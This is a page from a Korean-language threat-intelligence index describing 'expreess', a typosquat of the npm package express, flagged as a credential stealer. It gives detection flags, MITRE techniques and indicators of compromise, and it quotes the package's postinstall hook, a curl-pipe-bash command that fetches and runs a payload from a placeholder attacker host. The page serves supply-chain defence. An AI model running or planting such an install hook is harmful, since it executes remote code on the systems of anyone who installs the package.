/incidentsfield log

탐지 캠페인 유출지 패턴 LLM 사고 사례 방법론

↺rss ↗cremit.io

incidents.cremit.io

실제 발생한 비인간 식별자(NHI) 크리덴셜 유출 사고를 정리한 인덱스. 운영: Cremit

둘러보기

전체 사고
npm 공급망
CI/CD 침해
방법론

구독

RSS 피드
@cremit_io
GitHub

// 상태

모니터 가동중

// 빌드

2026-05-20

// 출처

cremit · 서울, 대한민국

// 라이선스

© 2026 Cremit. 출처 표시 시 자유롭게 재사용 가능.

expreess flagged credential stealer (npm) — Cremit · NHI Credential Stealer Index

홈/packages/npm/expreess

// npm 패키지

expreess

AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-04

// exfil path

what is read → where it ships

steals

(no specific credential-read flag matched)

→

sends to

⚙ curl | bash(fetches + executes remote payload)

Targets resolved from static-analysis flags; destinations extracted from the captured code excerpt. Full list + structured fields available in the IOC panel below.

// attacker iocs

extracted from static excerpt · copy into IR / EDR / WAF / TIP

MITRE ATT&CK

T1059.004Command and Scripting Interpreter: Unix Shell
T1195.002Supply Chain Compromise: Compromise Software Supply Chain

HTTP destinations

http://attacker.example/p

// offending code· @1.0.0· 1 file flagged

llm: malicious · 0.95

→ 정적 분석기가 curl-pipe-bash 패턴 검출 — 설치 경로에 원격 코드 실행 형태가 그대로 드러남.

@1.0.0·2026-05-04·AUTO-PUBLISHED·publisher: n3w_pub_42
heuristic 100/100
static flags 1
llm malicious (0.95) via fast-track
install-scripts:postinstallnew-publisher:18dtypo-match:express:d1first-version-suspicious-publishercurl-pipe-bash
→ 정적 분석기가 curl-pipe-bash 패턴 검출 — 설치 경로에 원격 코드 실행 형태가 그대로 드러남.
// offending code· 1 file flaggedpatterns: 1
```
--- package.json:scripts.postinstall ---
curl -s http://attacker.example/p | bash
```

// package.json:scripts.postinstall

curl -s http://attacker.example/p | bash